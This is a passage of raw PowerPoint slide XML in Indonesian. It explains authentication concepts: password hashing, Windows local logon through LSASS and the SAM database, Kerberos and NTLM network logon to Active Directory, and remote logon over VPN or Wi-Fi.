              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menopang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plaintext </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gantinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketikkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di basis data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18413117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Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (docs. microsoft.com/id/us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tipikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Masuk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Subsistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otoritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (LSASS) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di basis data Security Accounts Manager (SAM), yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>registri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> logon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>interaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LSASS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain Active Directory (AD). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disukai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada Kerberos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NT LAN Manager (NTLM).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Masuk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh-digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual (VPN), Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> portal web. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
